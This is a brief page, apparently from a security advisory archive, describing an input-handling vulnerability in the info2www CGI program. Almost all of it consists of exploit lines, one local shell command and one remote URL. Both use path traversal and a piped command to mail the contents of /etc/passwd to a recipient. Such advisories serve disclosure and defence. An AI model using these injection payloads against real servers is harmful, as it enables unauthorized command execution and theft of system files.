|
|
Info2www CGI Input Handling Vulnerability
Locally: $ REQUEST_METHOD=GET ./info2www '(../../../../../../../bin/mail recipient </etc/passwd|)' $ You have new mail. $ Remotely: http://targethost/cgi-bin/info2www?(../../../../../../../../bin/mail recipient </etc/passwd|) |
|
Privacy Statement |